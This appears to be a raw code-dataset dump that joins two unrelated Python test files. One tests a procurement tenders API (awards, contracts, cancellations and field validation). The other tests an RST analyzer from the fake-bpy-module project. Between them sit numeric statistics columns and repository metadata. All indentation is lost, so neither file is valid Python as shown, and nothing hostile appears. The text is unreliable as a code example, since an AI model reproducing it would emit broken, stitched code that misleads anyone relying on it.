response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(response.json['data'], [])
# create award
response = self.app.post_json('/tenders/{}/awards'.format(tender_id),
{'data': {'suppliers': [test_organization],
"value": {"amount": 500}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"qualified": True, "status": "active"}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # reporting procedure does not have complaintPeriod
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
# check status
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
# create new tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 1)
# get last award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][-1]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active"}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract = response.json['data']['contracts'][-1]
self.assertEqual(contract['awardID'], award_id)
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # reporting procedure does not have complaintPeriod
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# set award to cancelled
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token),
{"data": {"status": "cancelled"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'cancelled')
# try to sign contract
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract['id'], owner_token),
{"data": {"status": "active"}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'][0]["description"], "Can't update contract in current (cancelled) status")
# tender status remains the same
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'active')
def multiple_awards_tender(self):
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(response.json['data'], [])
# create award
response = self.app.post_json('/tenders/{}/awards'.format(tender_id),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
award = response.json['data']
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token),
{"data": {"qualified": True, "status": "active"}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
'value': {"amount": 501}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.json['errors'][0]["description"], "Can't create new award while any (active) award exists")
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token),
{"data": {"status": "cancelled"}})
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 505}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 2)
# get last award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][-1]
# set award as active
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award_id, owner_token), {"data": {"status": "active"}})
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract = response.json['data']['contracts'][-1]
self.assertEqual(contract['awardID'], award_id)
# time travel
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # reporting procedure does not have complaintPeriod
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract['id'], owner_token), {"data": {"status": "active"}})
# check status
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.json['data']['status'], 'complete')
def tender_cancellation(self):
# empty tenders listing
response = self.app.get('/tenders')
self.assertEqual(response.json['data'], [])
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create cancellation
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# create cancellation
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 1)
award = response.json['data'][0]
self.assertEqual(award['status'], 'pending')
# set award as active
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
# create cancellation in stand still
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'cancelled')
# create tender
response = self.app.post_json('/tenders',
{"data": self.initial_data})
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
# create award
response = self.app.post_json('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token),
{'data': {'suppliers': [test_organization],
"qualified": True,
"value": {"amount": 500}}})
self.assertEqual(response.status, '201 Created')
# get awards
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(len(response.json['data']), 1)
award = response.json['data'][0]
self.assertEqual(award['status'], 'pending')
# set award as active
response = self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(tender_id, award['id'], owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
# get contract id
response = self.app.get('/tenders/{}'.format(tender_id))
contract_id = response.json['data']['contracts'][-1]['id']
tender = self.db.get(tender_id)
for i in tender.get('awards', []):
if i.get('complaintPeriod', {}): # works for negotiation tender
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
# sign contract
self.app.authorization = ('Basic', ('broker', ''))
self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(tender_id, contract_id, owner_token), {"data": {"status": "active"}})
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'complete')
# create cancellation
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(tender_id, owner_token), {'data': {
'reason': 'invalid conditions',
'status': 'active'
}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
response = self.app.get('/tenders/{}'.format(tender_id))
self.assertEqual(response.status, '200 OK')
tender = response.json['data']
self.assertEqual(tender['status'], 'complete')
# TenderNegotiationProcessTest
def tender_cause(self):
data = deepcopy(self.initial_data)
del data['cause']
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'This field is required.'], u'location': u'body', u'name': u'cause'}
])
data['cause'] = 'unexisting value'
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u"Value must be one of ['artContestIP', 'noCompetition', 'twiceUnsuccessful', 'additionalPurchase', 'additionalConstruction', 'stateLegalServices']."],
u'location': u'body', u'name': u'cause'}
])
data['cause'] = 'noCompetition'
del data['causeDescription']
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'This field is required.'], u'location': u'body', u'name': u'causeDescription'}
])
data['causeDescription'] = ''
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'String value is too short.'], u'location': u'body', u'name': u'causeDescription'}
])
data['causeDescription'] = "blue pine"
response = self.app.post_json('/tenders', {"data": data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['causeDescription'], 'blue pine')
tender_id = self.tender_id = response.json['data']['id']
owner_token = response.json['access']['token']
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token), {"data": {"cause": "artContestIP"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['cause'], 'artContestIP')
# TenderNegotiationQuickProcessTest
def tender_cause_quick(self):
data = deepcopy(self.initial_data)
self.assertNotIn('cause', data)
response = self.app.post_json('/tenders', {"data": data})
self.assertEqual(response.status, '201 Created')
data['cause'] = 'unexisting value'
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u"Value must be one of ['quick', 'artContestIP', 'noCompetition', 'twiceUnsuccessful', 'additionalPurchase', 'additionalConstruction', 'stateLegalServices']."],
u'location': u'body', u'name': u'cause'}
])
data['cause'] = 'quick'
del data['causeDescription']
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'This field is required.'], u'location': u'body', u'name': u'causeDescription'}
])
data['causeDescription'] = ''
response = self.app.post_json('/tenders', {"data": data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['status'], 'error')
self.assertEqual(response.json['errors'], [
{u'description': [u'String value is too short.'], u'location': u'body', u'name': u'causeDescription'}
])
data['causeDescription'] = "blue pine"
response = self.app.post_json('/tenders', {"data": data})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['causeDescription'], 'blue pine')
def tender_with_main_procurement_category(self):
data = dict(**self.initial_data)
# test fail creation
data["mainProcurementCategory"] = "whiskey,tango,foxtrot"
response = self.app.post_json('/tenders', {'data': data}, status=422)
self.assertEqual(
response.json['errors'],
[{
"location": "body",
"name": "mainProcurementCategory",
"description": ["Value must be one of ['goods', 'services', 'works']."]
}]
)
# test success creation
data["mainProcurementCategory"] = "goods"
response = self.app.post_json('/tenders', {'data': data})
self.assertEqual(response.status, '201 Created')
self.assertIn('mainProcurementCategory', response.json['data'])
self.assertEqual(response.json['data']['mainProcurementCategory'], "goods")
tender = response.json['data']
token = response.json['access']['token']
self.tender_id = tender['id']
# test success update tender in active status
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], token),
{'data': {'mainProcurementCategory': "services"}})
self.assertEqual(response.status, '200 OK')
self.assertIn('mainProcurementCategory', response.json['data'])
self.assertEqual(response.json['data']['mainProcurementCategory'], "services")
| 47.482155
| 190
| 0.641514
| 7,800
| 67,852
| 5.481795
| 0.051026
| 0.122433
| 0.14685
| 0.089527
| 0.882291
| 0.865288
| 0.850484
| 0.838533
| 0.816222
| 0.805627
| 0
| 0.016804
| 0.185227
| 67,852
| 1,428
| 191
| 47.515406
| 0.75662
| 0.025231
| 0
| 0.733813
| 0
| 0.001799
| 0.257706
| 0.055635
| 0
| 0
| 0
| 0
| 0.376799
| 1
| 0.021583
| false
| 0
| 0.005396
| 0
| 0.026978
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86797682b896f3258e622cb0747e755265953e33
| 70,147
|
py
|
Python
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 707
|
2017-10-28T04:37:26.000Z
|
2022-03-31T10:02:28.000Z
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 75
|
2017-12-05T00:26:19.000Z
|
2022-03-14T09:27:15.000Z
|
tests/python/fake_bpy_module_test/fake_bpy_module_test/analyzer_test.py
|
kant/fake-bpy-module
|
9de0e4cce17ee7e7c50fa2a3189584dd4b2bc897
|
[
"MIT"
] | 72
|
2018-02-17T08:08:20.000Z
|
2022-03-27T07:06:51.000Z
|
import os
import difflib
import json
from . import common
from fake_bpy_module.analyzer import (
BaseAnalyzer,
AnalyzerWithModFile,
)
from fake_bpy_module.common import (
SectionInfo,
ClassInfo,
FunctionInfo,
VariableInfo,
)
class BaseAnalyzerTest(common.FakeBpyModuleTestBase):
name = "BaseAnalyzerTest"
module_name = __module__
data_dir = os.path.abspath("{}/analyzer_test_data".format(os.path.dirname(__file__)))
def setUp(self):
super().setUp()
def tearDown(self):
super().tearDown()
def compare_dict_and_log(self, d1, d2):
json1 = json.dumps(d1, indent=4).split("\n")
json2 = json.dumps(d2, indent=4).split("\n")
diff = difflib.unified_diff(json1, json2)
self.log("\n".join(diff))
self.assertDictEqual(d1, d2)
def test_no_contents(self):
rst_files = ["no_contents.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_only_base_class(self):
rst_files = ["only_base_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_only_module_name(self):
rst_files = ["only_module_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_single_constant(self):
rst_files = ["single_constant.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_constants(self):
rst_files = ["multiple_constants.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
}, method='NEW')
section_info.add_info(variable_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_single_function(self):
rst_files = ["single_function.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
},
{
"type": "parameter",
"name": "arg_3",
"description": "function_1 arg_3 description",
"data_type": "function_1 arg_3 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_functions(self):
rst_files = ["multiple_functions.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}]
}, method='NEW')
section_info.add_info(function_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "method_1",
"description": "method_1 description",
"module": "module.a",
"parameters": [],
"parameter_details": [],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_single_class(self):
rst_files = ["single_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
},
{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=123"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "classmethod_1 arg_2 description",
"data_type": "classmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "classmethod_1 return description",
"data_type": "classmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "staticmethod_1 return description",
"data_type": "staticmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "function_1",
"description": "function_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2='MAX_INT'"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_classes(self):
rst_files = ["multiple_classes.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_noisy_1(self):
rst_files = ["noisy_1.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type, long",
}],
"methods": [{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["a", "b"],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_noisy_2(self):
rst_files = ["noisy_2.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type, long",
}],
"methods": [{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["a", "b"],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1=5.4"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"description": "DATA_2 description",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
